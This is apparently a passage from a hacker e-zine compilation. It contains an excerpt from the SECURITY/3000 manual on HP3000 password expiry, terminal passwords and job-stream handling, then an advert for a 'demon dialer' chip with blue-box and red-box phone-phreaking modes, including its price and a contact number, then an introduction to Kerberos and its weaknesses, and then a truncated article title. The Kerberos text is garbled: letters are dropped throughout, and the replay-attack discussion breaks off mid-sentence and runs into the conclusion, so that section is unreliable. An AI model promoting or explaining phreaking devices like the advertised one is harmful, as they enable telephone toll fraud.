that the password is about to expire displayed during the 5 days before the
password will expire, execute the command:

:ALTACCT "GAMES;PASS=FUNTIME"

and respond to the prompts as follows:

Password is currently obsoleted every 30 days; new value: 60
Warning period before obsolescence is 7 days; new value: 5

For a more critical password on a more sensitive account, such as the PAYROLL
account, you may want to obsolete the password every 14 days with 3 days of
warning, as follows:

:ALTACCT "PAYROLL;PASS=BIGBUCKS"

and then answer the prompts as follows:

Password is currently obsoleted every 30 days; new value: 14
Warning period before obsolescence is 7 days; new value: 3

WHAT IS DONE WHEN A PASSWORD EXPIRES
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
If a user password has been obsoleted (expired), the user should have his
Account Manager change the password to permit the user to log on. If an
account password has been obsoleted, the Account Manager should have the System
Manager change that password to permit users of that account to log on.

In a situation where a user password of an Account Manager or of the System
Manager has expired, there is no one with the capabilities to change the
password; therefore, it is necessary to modify the internal data base according
to the following example:

1. :HELLO MANAGER.SECURITY,DATA

2. :RUN QUERY.PUB.SYS
>BASE=OBSOL
PASSWORD= >>; << enter a ';' >>
MODE = >>1

3. >FIND USER+ACCT ="MANAGER VESOFT " << if USER password >>
>FIND ACCT+GROUP="VESOFT DEV " << if GROUP password >>
>FIND ACCT=VESOFT << if ACCOUNT password >>

4. >REPLACE OBS-DAYS="500"; END
>EXIT

This will temporarily "un-obsolete" the password, allowing the Account or
System Manager to log on. Once logged on, he should change the password and
re-define "obsolescence days" when prompted.

ACCESSING THE OBSOL DATA BASE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The password obsolescence data base is

OBSOL.DATA.SECURITY

and contains the following data sets:

OBS-ACCT
OBS-USER
OBS-GROUP

The data base contains information about all the passworded users, groups, and
accounts on the system. IT DOES NOT CONTAIN THE MPE PASSWORDS. The valid data
items are as follows:

LAST-CHG-DATE the date (in YY/MM/DD format) that the password
was last changed
OBS-DAYS number of obsolescence days
WARN-DAYS number of warning days

Ignore DUMMY1, DUMMY2, and FILLER--they're just there for SECURITY/3000's
convenience.

For added security, it is normally recommended that the system manger change
the data base password (as follows) and the password obsolescence system will
still be able to (magically!) access the data base:

:HELLO MANAGER.SECURITY,DATA
:RUN DBUTIL.PUB.SYS
>>SET OBSOL PASSWORD 1=password
>>EXIT

TERMPASS -- passwords DIAL-UPs, terminals, DS lines, LANs, etc.
***************************************************************

INTRODUCTION
~~~~~~~~~~~
With the current explosion in datacom and with HP providing all supported sites
with telesupport modems, nearly every HP3000 site has dial-up access.

With the added benefits and convenience that dial-up access provides, a whole
new world of security considerations emerges: the system is threatened not
only by users within your company or on your premises, but by anyone with a
terminal or microcomputer, a telephone, and a modem!

With the current wave of computer crime and the new breed of "hackers" whose
enjoyment comes from wreaking havoc <sic> on computer systems, special security
must be placed on dial-up lines.

TERMPASS implements this extra security not only on dial-up lines but on DS
lines, terminals, and anything else that supports interactive communication
(MTS, LAN, X.25, etc.). Unfortunately, although MPE permits user, account, and
group passwords, it does not allow one to set terminal passwords. TERMPASS
allows the System Manager to set a password on any LDEV, which must be answered
correctly by the user at logon time to gain access to the system.

In addition, it allows you to marry the high level of user authentication that
the Logon Security System provides with the terminal and dial-up security that
TERMPASS gives you. You can implement the Logon Security System not only on
certain accounts and certain users, but also based on which device a user is
logging on to.

HOW TERMPASS WORKS
~~~~~~~~~~~~~~~~~
TERMPASS is configured by specifying which LDEVs are to be passworded and what
the passwords are. Then set a systemwide logon UDC which will run the TERMPASS
program whenever users log on.

Whenever a user logs on to a terminal which has been configured with a
password, after he correctly answers required MPE passwords, he is prompted for
the terminal password for that terminal. If he answers correctly, he is
allowed on the system. If he answers incorrectly, he is denied access to the
system (i.e. logged off, an inverse-video message describing the failed logon
attempt is sent to the console, and an entry is logged to the SECURITY/3000 log
file.

SETTING PASSWORDS ON SPECIFIC LDEVs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
You can configure TERMPASS by specifying which terminals are to be passworded
and what the passwords are. To do this, build the file

TERMPASS.DATA.SECURITY

with your editor, and add one line for each terminal to be passworded in the
format

LDEV password

where 'LDEV' is the logical device number of the terminal (e.g. '20') to be
passworded and 'password' is the password (e.g. 'OPERONLY'). Any terminal not
included in this file will remain unpassworded.

So, for example, if you created the TERMPASS data file in your editor as
follows:

:EDITOR
/ADD
1 20 OPERONLY << the console >>
2 21 WARGAMES << a dial-up line >>
3 22 XYZZY << a terminal >>
4 65 KEEPOUT << a DS line >>
5 //
/KEEP TERMPASS.DATA.SECURITY,UNN
/EXIT

then the passwords specified would be placed on the corresponding LDEVs.

AFTER YOU /KEEP THIS FILE (AND AFTER ANY SUBSEQUENT /KEEPs), YOU MUST

:ALTSEC TERMPASS.DATA.SECURITY;(R,X,A,L,W:CR)

THIS IS EXTREMELY IMPORTANT! IF YOU DO NOT DO THIS, ANYBODY WILL BE
ABLE TO READ THIS FILE! YOU MAY ALSO USE A LOCKWORD TO PROTECT
THIS FILE:

:RENAME TERMPASS.DATA.SECURITY, TERMPASS/lockword.DATA.SECURITY

DISABLING A TERMINAL WITH AN ATTEMPTED REMOTE LOGON VIOLATION
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
If a user is unsuccessful in logging on through a dial-up line or an inhouse
terminal configured with TERMPASS, it is often desirable to "hang" that LDEV or
terminal so that further logon attempts are not possible.

To do this, determine the time in seconds for which you would like the LDEV or
terminal hung and then add a line to the TERMPASS.DATA.SECURITY file in the
format:

PAUSE=numseconds

where 'numseconds' is the number of seconds for which the terminal will be
hung. Then, when a user has an unsuccessful logon attempt, he will be hung for
the amount of time specified.

By default, 'numseconds'=0 which means that the user will not be hung at all.

SPECIFYING NUMBER OF ATTEMPTS TO ANSWER TERMINAL PASSWORD
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
You may specify the number of attempts users are allowed to answer the terminal
password at logon by adding a line to the TERMPASS.DATA file in the format:

TIMES=attempts

where 'attempts' is the number of times the terminal password will be asked.

By default, 'attempts'=1.

LOGGING SUCCESSFUL REMOTE LOGONS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
You may wish to know who is logging on through the dial-up line, or whether a
particular logon is being utilized. You may also feel relieved to see that an
unsuccessful attempt is directly followed by a successful attempt, meaning that
the error was probably a typo. You may enable SECURITY/3000 to log successful
logons which pass through the TERMPASS program by adding a line to the
TERMPASS.DATA.SECURITY file in the format:

LOG-LOGON=ON

This keyword will be seen by the REMOTE security system and cause all
successful logons to be written to the LOG.DATA.SECURITY file for later review.
No other configuration is required and this keyword may be added or removed at
any convenient time. When the log file is later reviewed (see HOW TO LIST THE
SECURITY LOG FILE in the LOGON section of this manual) the message:
'SUCCESSFUL REMOTE LOGON' will be displayed.

INVOKING THE LOGON SECURITY SYSTEM VIA TERMPASS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Generally, the Logon Security System in SECURITY/3000 (personal profile
passwords, time, day, and menu restrictions) are imposed on certain users and
accounts by setting a UDC (SECURUDC.PUB.SECURITY) on that user or account; then
all the users who have that UDC set must go through SECURITY/3000 to log on

However, you can also impose the Logon Security System on users logging on to
certain devices instead of (or in addition to) users on which SECURUDC has been
set. Say, for example, you want to have the Logon Security System run EITHER
on the users/accounts on which you've set SECURUDC OR on any accesses to the
system from certain LDEVs (e.g. dial-up modem ports, DS line ports, terminal
ports, etc). For example, to set things up so that anybody who EITHER uses the
PAYROLL account OR signs on to LDEV 36 (or both) will have to go through the
Logon Security System, declare a line in the TERMPASS configuration file,
TERMPASS.DATA.SECURITY, which looks like this:

36 SECRET $SECURITY

Note that LDEV 36 still has a terminal password ("SECRET"); but, because there
is a '$SECURITY' keyword on that line means that IN ADDITION TO TERMPASS asking
the terminal password, the Logon Security System will always be run for all
logons to LDEV 36.

If you want to, you can implement the Logon Security System on an LDEV without
placing a password on that LDEV - just omit the terminal password ("SECRET")
while keeping the $SECURITY keyword, leaving the line looking like

36 $SECURITY

Note that you still have to set the TERMPASS UDC (TERMUDC.PUB.SECURITY) on a
system-wide basis, since it's the TERMPASS program that checks the
TERMPASS.DATA.SECURITY file and invokes SECURITY/3000's Logon Security System
if it finds the $SECURITY keyword associated with the logon LDEV.

So, for example, TERMPASS.DATA.SECURITY might look like:

20 OPERONLY
25 $SECURITY
36 SECRET $SECURITY

This would mean that LDEV 20 has the password "OPERONLY" but won't have
SECURITY/3000 automatically invoked; 36 has the password "SECRET", and anybody
who logs on to it would have to go through the Logon Security System; and LDEV
25 has no terminal password, but all people who use it will be checked by the
Logon Security System.

Meanwhile, SECURUDC is still set on the PAYROLL account, and on whatever other
users or accounts you want to always be secured; the Logon Security System will
be run on them whether or not the user is using LDEV 25 or 36.

Of course, every user who will ever go through the Logon Security System - this
includes every user who will ever sign on to LDEV 25 or 36--must be put into
the SECURITY database using the ADD option of USER.PUB.SECURITY. This actually
is quite good, since it gives you the opportunity to allow only certain users
to use LDEV 25 or 36 - just authorize only those users, and all others will be
automatically forbidden.

Note that the Logon Security System can thus be called either from the TERMPASS
UDC (TERMUDC.PUB.SECURITY) you set up on a system-wide basis or the Logon
Security System UDC (SECURUDC.PUB.SECURITY) you set up on each account or user.
What if a user signs on to a secured account using a secured terminal? Well,
you don't want to make him go through the Logon Security System twice, so if
the Logon Security System was already run via TERMPASS, it won't be run again.

STREAMX/3000 - ELIMINATES THE NEED TO EMBED PASSWORDS AND OTHER
SENSITIVE INFORMATION IN JOB STREAMS
************************************************************************

INTRODUCTION
~~~~~~~~~~~
In MPE, all job streams must contain the passwords for the user, account, and
group under which they are to be streamed. Needless to say, this is a huge
security hole because anyone who has READ access to the file can look at it and
see the passwords. What's more, any listing of the job stream (of which plenty
are liable to be laying around the computer room) contains the password.

Furthermore, although MPE passwords are not echoed to the screen when you log
on, they are when you're working on a job stream in the editor. Who is looking
over your shoulder at your password on the screen? If you are working on a job
and walk away from your terminal, who can read it? Do you always clear the
screen when you walk away from the terminal--or even when you log off?

More importantly, since changing a password means having to change every single
job stream that contains it, MPE passwords are virtually guaranteed never to be
changed.

Some HP3000 sites work around this problem in a variety of ways, few of which
are very effective. A common "solution" is to create a dummy user (e.g.
'JOB') who exists solely for the purpose of streaming jobs, and remove his IA
capability--this can be gotten around quite easily by logging on with a :JOB
command and prefixing every command with a ':'. Others try to use the MPE file
security to restrict READ access to job stream files, but forget to :ALTSEC the
file to replace the file security after every /KEEP of the file (which waives
the prior file security).

THE SOLUTION
~~~~~~~~~~~
STREAMX/3000 closes this security hole by eliminating the need to embed MPE
passwords in job streams. It also eliminates the need to embed other sensitive
information in job streams, such as data base passwords, file lockwords,
:REMOTE HELLO passwords, etc. STREAMX also adds flexibility to job streams by
allowing you to pass parameters.

The logical alternative to embedding passwords in job streams is to prompt for
the passwords at :STREAM time, just as session passwords are prompted for at
:HELLO time. This is what STREAMX does. And to make life easier, if you have
enough capabilities to retrieve the passwords, they will be answered for you
automatically.

HOW STREAMX WORKS
~~~~~~~~~~~~~~~~
When you stream a job, STREAMX will analyze the job stream, as well as all the
job streams streamed by it, and will prompt you for all the passwords needed as
well as any parameters for which you have instructed STREAMX to prompt. Then,
it will incorporate the passwords and parameters into the job stream (without
changing the actual disc file), and then stream it.

As in MPE, the output file of the job stream will not contain the passwords.

Naturally, STREAMX will not prompt you for passwords that do not exist. If the
job stream already has the correct passwords embedded in it, those passwords
will not be prompted for; on the other hand, if the passwords embedded in the
stream are incorrect, they will be prompted for. This permits you to change
your MPE passwords and begin using STREAMX right away.

Also, if you have enough capabilities to retrieve the passwords in MPE (via
:LISTUSER, :LISTACCT and :LISTGROUP or LISTDIR), STREAMX will automatically
generate the passwords without any prompting (because, after all, you can find
them out anyway). This means that if you are an Account Manager streaming a
job in your account or an ordinary user streaming a job with the same user ID,
STREAMX will automatically generate the passwords (because you had to know them
to sign on). If you are the System Manager (or have SM capability), STREAMX
will never prompt you for a password because you can retrieve any password on
the system.

WHICH USER STREAMED A JOB? (ENHANCED JOB $STDLIST)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
STREAMX will enhance the $STDLIST of a job to contain some additional
information. The logon user ID of the user streaming the job and the LDEV from
which the job was streamed will be written to the job's output file, e.g.

:COMMENT STREAM FILE UPDATE.PUB.PAYROLL
:COMMENT STREAMED BY JOAN,CLERK.PAYROLL,PUB ON LDEV 26

so you can determine not only who the job logged on as, but also who actually
streamed it. If the job stream was launched from another job stream, the user
ID (from the !JOB card) of the first job stream will be written to the output
file, as well as the user who streamed that job stream.

PERMITTING THE SYSTEM OPERATOR TO STREAM ANY JOB STREAM
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
In many installations, the system operator (OPERATOR.SYS) is responsible for
streaming system job streams which accomplish backups, etc. STREAMX will
prompt the operator for the password for each !JOB card; but you may not want
to disclose various passwords to the operator.

As you know, STREAMX will not prompt for the passwords if a user has enough
capabilities to retrieve them, e.g. MANAGER.SYS can stream any job on the
system without being prompted for the passwords; but you do not want to give
your operator SM capability to accomplish the streaming of system job streams.

A good solution is to put all the system job streams in a special
group, e.g. JOB.SYS, and set up a UDC which the operator will use to stream
the jobs which will also temporarily allow the user SM capability for the
duration of streaming the job.

The following UDC runs the GOD.PUB.VESOFT program which gives the user SM
capability, then runs STREAMX to stream the job, and then runs
MORTAL.PUB.VESOFT to reset the user's capabilities to their original state.
Notice that the UDC is OPTION NOBREAK and contains a CONTINUE command so that
after the program GOD is run, there is a very high probability that the
capability reduction program MORTAL will execute. This increase and subsequent
guaranteed reduction of capability is what makes this UDC successful. Notice
also that the UDC has the option NOLIST. If the operator could see the text of
the UDC executing, then the operator would know the lockword to the program
GOD. Additionally, the UDC option NOHELP has been specified to prevent the
operator from :HELP OPSTRM which also reveals the program GOD's lockword.

OPSTREAM filename
OPTION NOHELP, NOLIST, NOBREAK
FILE STRMFILE=!FILENAME.JOB.SYS
RUN GOD/lockword.PUB.VESOFT
CONTINUE
RUN STREAMX.PUB.SECURITY;PARM=1
RUN MORTAL.PUB.VESOFT
RESET STRMFILE

There are two other important technical issues to be mentioned. First, the
operator should not be able to write to, nor save a file into the controlled
group JOB.SYS. Otherwise, the operator could create a job stream which logs on
as MANAGER.SYS and LISTDIR's all the MPE passwords. If the operator has write
access, there is no need to save a special file into the controlled group
JOB.SYS - just write over one that is already there. Second, the operator
should not have READ access to the UDC file which contains the lockword to the
program GOD. If both these points are maintained, the operator will not be
able to circumvent the intent. Note also that in order to :SETCATALOG a UDC
file you must have READ and LOCK access to it. This means that an ordinary
setcatalog of the UDC file will not provide adequate security (read access is
not permissable). The solution is to use a LOCKWORD to protect the UDC file
OPSTRM. This means you can release the file and then assign it a lockword.
Now when you :SETCATALOG the file, you must specify the lockword also (e.g.
:SETCATALOG OPSTRM/secret).

BUT - the file COMMAND.PUB.SYS has read access for all users, thus it can be
scanned and the lockwords with which UDC's are set can be determined. Also -
if someone is reading this file (say, with FCOPY, QUAD, etc.), another process
cannot resolve its UDC catalog. This is especially of concern where OPTION
LOGON UDCs are invoking SECURITY. Be sure to reduce the general access to
COMMAND.PUB.SYS so that the file may only be Locked and Xecuted - by :ALTSEC
COMMAND.PUB.SYS;(L,X:ANY).

So - with this UDC set for the operator, whenever the operator types

:OPSTREAM filename

the job stream filename.JOB.SYS will be streamed and the passwords needed on
the !JOB card will be resolved automatically - regardless of the job's logon
user ID.

LOCKWORDS
~~~~~~~~
Just as you shouldn't embed passwords into your job streams, you shouldn't
embed lockwords, either. If you have a lockword on, say, QUERY.PUB.SYS, you
might have a line in your job stream like

!RUN QUERY/?WHAT IS THE QUERY.PUB.SYS LOCKWORD?.PUB.SYS

Or, even better, you can say

!RUN QUERY/?$NOECHO$ WHAT IS THE QUERY.PUB.SYS LOCKWORD?.PUB.SYS

which won't echo the user's response.

However, STREAMX has an even better way of doing this! If you say

!RUN ?$LOCKWORD=QUERY.PUB.SYS$?

then STREAMX will automatically ask the user for the QUERY.PUB.SYS lockword, or
-- if the user is the system manager or the account manager of the SYS account
(the account in which QUERY.PUB.SYS resides) -- automatically supply the
lockword. This is just like the way STREAMX treats :JOB card passwords -- it
asks for them when necessary, but automatically supplies them when appropriate.
For instance, if the person streaming the job stream has SM capability and the
QUERY.PUB.SYS lockword is FROBOZZ, STREAMX will automatically convert the

!RUN ?$LOCKWORD=QUERY.PUB.SYS$?

to a

!RUN QUERY/FROBOZZ.PUB.SYS

On the other hand, if the streaming user doesn't have SM/AM capability, STREAMX
will prompt him with

WHAT IS THE LOCKWORD OF THE FILE 'QUERY.PUB.SYS'?

and will use the user's answer (entered without echo, of course) as the
lockword to be put into the job stream.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -



-------------------------------------------------------------------------------
______ __ __ _
/ / / ) / ) //
--/ /_ _ / / _ ______ ________ / / o __. // _ __
(_/ / /_</_ /__/_</_/ / / <_(_) / / <_ /__/_<_(_/|_</_</_/ (_

-------------------------------------------------------------------------------

Thanks to Durkatlon for the translation to English. The article comes courtesy
of Hacktik Magazine issues #16 an #17. If you can use it, cool, if not, skip
on to the next article. This is the form in which I received the file. I have
not tested or used this, as yet. Guess that gives me something for another
article.

-------------------------------------------------------------------------------

----------------------------------------------------------------------------
/ From Vodka, the Absolut drinking, Alpine smoking, information specialist.. \
| |
| Member of: PHD, Alliance Crew Associated with: Too many to list |
| |
| Hello's go out to: Dark Druid, Erik Bloodaxe, Mack Hammer, Knight Lightning|
| Marina, Randy S. Hacker, Nikodemus... And all the rest. |
| |
| This submission for information purposes only, NOT FOR ANY OTHER PURPOSE |
\____________________________________________________________________________/

DEMON DIALER SPECS
------------------
The chip contains a blue-box, DTMF dialer, C4 and ATF1 tonegenerator and much
more. Just about the whole stratum of phone-phreak knowledge has been
incorporated into this device and because the chip contains an amount of RAM
memory, new signalling systems can be built in. The ideal tool for today's
phone-phreak.

In the sequel is a list op all the abilities of the MC68HC705C8P/DD, as it is
officially called. Furthermore a small overview of what it takes to put a nice
little box around it.

THE MC68HC705C8P/DD
-------------------
It's a Motorola processor of the 68705 kind, programmed by us. It only
requires an additionla matrix keyboard of 3 by 4 keys, a couple of resistors,
and a D/A convertor with a filter. Hook it up to 5 Volts and there ya go, da
perfect phone-phreakin' tool.

If you power up the chip it's just a DTMF dialer, and if you don't enter the
right code that's exactly what it will stay. Only after the code's been
entered (which by the way is a different one for each chip) you can switch to
the other modes:

o DTMF, RedBox, C3, C4, C5, R1, R2 (both directions) and ATF1 modes built-in.
2 new sistems can be programmed later.

o Guard banding: Every tone or double-tone can be combined with a third
frequency.

o Advanced Macro capabilities. Macro nesting is possible.

o All settings are stored in RAM if the machine is switched off.

o For DTMF, C5 and C3, both space and mark timing are possible.

o C3 has programmed space and mark frequency and is thus useable as a general
purpose signalling system. Furthermore pulse-dialing is possible through a
relais-control-signal.

o User-Defined-Modes can make use of variable timing and frequencies.

o Tone-sweep and the ability to set starting frequency and step-size. Also
useable for continuous sweep.

o Phone number scan with variable step size for all signalling systems

CONSTRUCTION
------------
The MC68HC705C8P/DD is at the heart of a do-it-yourself bluebox, but a number
of elements you will have to build yourself. You're going to have to connect
the matrix keyboard as well as a simple D/A convertor and a speaker. The total
cost of hardware to be added shouldn't exceed the amount of 50 guilders. On
the flip page is the schematic [heheh..] and shipped with the chip is a
comprehensive set of datasheets and a software manual both in English and
Dutch. The hardware description pays more attention to the D/A convertor,
filter, keypad etc. than does this short article. Furthermore it contains
schematics to make the device run on 3 volts and drive an 8 ohm speaker.

HOW TO OBTAIN THE CHIP?

The chip costs 250 guilders, including shipping, a Dutch and English manual of
the software and a detailed description of the hardware. Pay the mailman. For
more information call +31-20-6001480.

*** NOTE: $1.00 US ~ 1.80 guilders

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -





The Kerberos Authentication System - An Intoduction
by x0d

Introduction
------------
This article is an introduction to Kerberos, an authentication system
written at MIT. It covers the security problems that motivated the creation of
Kerberos, the basic mechanisms of the Kerberos protocol and finally some
security flaws in the kerberos ystem. The first section covers some network
security strategies and the problems encountered. The second section goes
through the Kerberos protocol in a step by step fashion. The final section
briefly touches on some known attack plans in breaking Kerberos as well as some
limitations it has when adapted to other environments.

Motivation
----------
Networks allow many computers to convey information amoung each other.
Individual machines need not provide all the services needed by its users but
can rely on remote machines to provide services. Special program called
servers can be run on a specif ed machine, and anytime that service is needed a
program on the remote machine, called a client, can request the service on
behalf of the local machine. The idea of networked servers and clients is well
integrated into modern computing. Sometimes a ser er deals with importaint
personal information such as mail and must know the identity of the user
requesting the data. More than that the server would like to be sure that the
user requesting the service is indeed who he says he is.

Remote servers can authenticate clients trying to access their sevices
in several ways. First the remote server can do nothing. In this case the
remote server is depending on the clients host for authentication. An example
of this is the smtp service

When a client connects to this server it is assumed that all data it
receives is valid. If the client side decides to give false information the
service will gladly accept it, resulting in forged mail. It is up to the
client's host to keep this from appening. A second example is the yp service.
Unless carefully set up any client can connect to and use the remote yp
database server and it is up to the clients host to keep unauthorized users
from using the client (through permissions on the client p ogram). A more
secure authentication can be achieved by having the client's host machine
authenticate itself to the service but then trust any information that host
passes on about the identity of the client. This is the strategy of rlogin,
rsh and the system of 'trusted' hosts. If a connection comes from a rlogin
client on a trusted machine (which is weekly authenticated by the fact that it
has the correct address) then the service will allow the client to login to an
account of the same name. This trategy fails if the clients machine can forge
its address (and hence bypass the authentication) or if the security on the
client's machine has been bypassed allowing the client to take on any username.
In a more ideal authentication system a compromise in security on one machine
wouldn't lead to a compromise in secuity on a remote system.

The authentication system that Kerberos uses is based on an individual
authentication of each client. In this system a client must authenticate
itself for each service it uses. The remote login service offered by the
telnetd server is an example of th s. The client cannot login to a remote
account through the service unless the proper acount name and password where
entered. Although this may sound like a secure operation there is one major
flaw to it. Whenever a password is transmitted over the ne work it is in
danger of being compromised. A third party may be monitoring the network
traffic as it goes by and see the login name and password as they are being
used. This can be more dangerous than using the trusted host paradigm.

It is important to look at the environment that Kerberos was designed
for when looking at Kerberos. Kerberos was designed at MIT for MIT's Project
Athena. The hardware environment there consists of many privately owned and
many publically accessible w rkstations connected in a network with along with
several time-sharing machines which also act as file servers. Many services
are available with servers on many machines in the network. For example many
machines may be running a (modified) rlogin serve . Security of the
workstations cannot be trusted. They may be privately owned machines and the
owner may be free to bypass all security, or they may be rebooted with a
different root file system. Once a user has bypassed the general securities on
the machine he is free to alter his identity, alter his machines address, and
even eaves-drop over the network.

The goals in creating the Kerberos authentication system where based on
the environment. A machines address could not be trusted. The user-id of a
user on a particula machine could not be trusted. Any information sent over
the network should be usele s in attempts to impersonate another user.

c - client Kx - x's private key
s - server Tc,s - Ticket for c to use s
Kc,s - key shared Ax - Authenticator for client x
between c and s {abc}Kx - abc encrypted in key Kx
tgs - ticket granting server life - a tickets lifespan
kerb - authentication server addr - a clients address

Figure 1. Abbreviations.
-------------------------

The kerberos system itself is implemented as a collection of servers.
The two major types of severs in the Kerberos system are authentication servers
(called kerberos servers) and ticket granting servers (often refered to as tgs
in this paper).

Kerberos uses a system of private keys, tickets and authenticators. A
private key is a secret key used for encryption and decryption. Reading a
message encrypted in certain key is only possible if the key is known,
similarly encrypting a message in a certain key is only possible if the key is
known. Kerberos currently uses a modified DES algorithm known as DES cypher
block chaining. Normally DES encrypts each block (an arbitrary group of bits)
seperately but in cypher block chaining encryption of t e second block depends
on the contents of the first block. A ticket is a message (See Figure 2)

{Tc,s} Ks = { s, c, addr, life, Ks,c } Ks

Figure 2. Ticket.
------------------

that allows a client to use a service in much the same way a movie ticket
allows a person to be admitted into the theatre. To prevent a ticket from
being altered it is encrypted in a key known only to the server that the ticket
is intended for. The ticket contains the name of the serve, the name of the
client who can use the ticket, the address of that client, the lifetime for
which t e ticket can be used (tickets usually expire 8 hours after the initial
login), and the key that is shared between the server and client. An
authenticator is a message which contains identification information about a
client. Authenticators are always en rypted in a key shared by the client
sending it and the server it is sent to. Authenticators contain the clients
name, the clients address, and a timestamp. All the clients and servers using
kerberos must have loosely synchronized clocks. Any authent cator older than
five minutes is invalid.

{Ac} Ks,c = { c, addr, timestamp } Ks,c

Figure 3. Authenticator.
-------------------------

Mechanics
---------
Using kerberos involves three processes. First a user must log in.
When logging in the user's client receives a ticket to use the ticket granting
service upon being authenticated. This ticket allows him to use the ticket
granting service which is use in getting tickets for any other service that the
client wants to use. After getting a ticket from the ticket ganting server the
client can use that server until the ticket expires. Since any new ticket
granted has a lifetime that is the same as the ticket used to acquire it, all
tickets expire 8 hours after the initial login (with the exception of certain
tickets with specified shorter lifespa ). This means that if a user remains
online for 8 hours he must re-login. Besides having to re-log in every 8 hours
the entire process is transparent to the user. The login is much like a login
to a non-kerberos system and the additional tickets aquir d during the session
are all aquired without the users intervention.

The goal of the login process is to aquire a ticket to use the ticket
granting service and to authenticate the user. If the user is unable to be
authenticated he should not be able to access the ticket granting server. When
the user walks up to the co puter and enters his login name a message is sent
to the authentication server containing the client's name (that is, the name of


Client ---- c, tgs ----> Kerb
Client <-- { Kc,tgs {Tc,tgs}Ktgs }Kc -- Kerb

Figure 4. Login.
-----------------

the user) and the (See Figure 4)ticket granting service which the client wishes
to use. The kerberos server then builds a ticket (noting the clients name and
address in it) for that tgs and encrypts it in a special key that the tgs
knows. It also creates a session key which will be u ed in conversations
between the client and the tgs. It looks up the clients name and a
corresponding key derived from the users password in its database. It then
encrypts the session key and the ticket in the clients secret key and sends it
back to the client. The user is then prompted for his password. The secret
key is then computed from his password and used to decrypt the message from the
kerberos server. If the user typed in the wrong password the message will not
decrypte properly. If the co rect password is entered the client now holds a
ticket to use the tgs and a key to use when sending messages to the tgs.

Once a client has a ticket to use the tgs it may request more tickets
for other services. The client first builds up an authenticator and encrypts
it in the session key. It then sends a message to the tgs containing the name
of the requested service the ticket to use the tgs and the authenticator. The
tgs first decrypts the ticket with its secret key. In the ticket is the

Client -- s, {Tc,tgs}Ktgs, {Ac}Kc,tgs --> TGS
Client <-- { {Tc,s}Ks, Kc,s }Kc,tgs -- TGS

Figure 5. Getting More Tr.
---------------------------

session key the tgs sends back to the client the ticket and the new key all
encrypted in the key shared between the client and the tgs. When the client
receives the message it just decrypts it and has a ticket for the requested
service and a key to use when talking to it.

To use a service the client first authenticates itself. It does this by building an authenttor, encrypting it in the key shared between the client and the server and sending it to the serve lng with the ticket to use that server. When the server
gets the ticket it just decrypts the ticket, uses the shared key contained in the ticket to decrypte authenticator, and compares the information contained in them. If everything matches the clienti llowed to use the service and subsequent request
will be allowed. In some cases the client would also like to make sure it is
indeed talking to the real server and not an imposter. The server can validate
itself to the client by taking the timestamp from the authenticator, adding one
to it, and sending it back. If the service was ot the real thing, it would not
have the servers private key, would not be able to read the ticket and get the

Client -- {Ac}Kc,s, {Tc,s}Ks --> Server
Client <-- { timestamp + 1 }Kc,s -- Server

Figure 6. Getting More Tickets.
--------------------------------

shared key, would not be able to read the timestamp and add one to it, and
would not be able to re-encrypt it and send it back. If the client recieves
the incremented timestamp back it can be sure that the server did indeed have
the servers private key.

Along with these three important processes there are many other
supporting processes in the kerberos system. For example there are the
database management processes for adding new users and changing passwords and
there are slave kerberos and tgs server which contain copies of the kerberos
and tgs databases to avoid a bottlenecks. There is also a kerberos network
file system which follows a slightly different protocol in order to avoid the
large number of encryptions that using the kerberos protocol w uld cause.

Security Flaws
--------------
Although Kerberos increases the security of the network it is used on,
it is not flawless. There are several proposed line of attacks that could be
used against the Kerberos protocol, and several limitations that it suffers
when used in an environment ther than the one it was designed for.

Kerberos was designed for a network consisting of many workstations
being used by individual users connected to a few large time-sharing machines
that provide services such as file storage and mail delivery. The keys
accumulated by the client during the session are stored in the /tmp directory
in the current version of Kerberos. If more than one user was logged in on the
same machine it would be possible for one user to view another users session
keys and use them to impersonate that user. On the wor stations Kerberos was
first implemented on the /tmp directory was located on the workstation itself,
but if a diskless workstation was used the keys would have to go over the
network to their destination, and back to the workstation whenever accessed. E
en on workstations with disks, the keys may be swapped out of memory onto the
remote file server if virtual memory is supported. These keys would be easy to
intercept by simply watching the network for access to and files in the
temporary directory or f r swapped out pages. Use of Kerberos is also
problematic when on a large machine with multiple addresses, since each ticket
holds information about only one address. On systems with more than one user
it is possible for users to find out the keys of ot er users logged in at the
same time if they can bypass the security of the temporary files in which they
are stored. Once a user has these keys he can impersonate the other user.

One of the most popular attacks on the Kerberos protocol is replay. An
eaves-dropper can watch as a known client sends an authenticator and ticket to
a server. When that client logs out the eaves-dropper can change his address
to the address the client was using (and hence the address in the authenticator
and the ticket) and change the client name to that of the client. Then the
ticket and authenticator can once the security of one of its hosts has been
compromised. Kerberos was designed to maintain network se urity even in these
circumstances. The mechanisms of encrypted authenticators and tickets was
looked at and in particular the pocesses of getting a ticket for the ticket
ganting service and getting tickets for arbitary services and then using the
services it was looked at. Finally some known flaws and limitations of
Kerberos where looked at and it was seen that Kerberos is not yet completely
secure from attacks.


Bibliography
------------

1. C. H. Meyer and S. M. Matyas, Cryptography: A New dimension in
Computer data Security, John Wiley and Sons, New York (1982).

2. N. Koblitz, A Course in Number theory and Cryptography, Springer-Verlag,
New York (1987).

3. A. Salomaa, Public-Key cryptography, Springer-Verlag, Berlin (1990).

4. J. G. Steiner, C. Neuman and J. I. Schiller, Kerberos: An
Authetication Service for Open Network Systems (Mar. 1988).

5. S. M. Bellovin and M. Meritt, Limitations of the Kerberos Authentication
System, Proc. Winter USENIX Conference, Dallas (1991).

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -




Computer Crime Investigation
submitted by: cdmorgan

Copied from "Dedicated Computer Crime Units"
(A National Institute of Justice Publication!)

Bulletin Board Stings
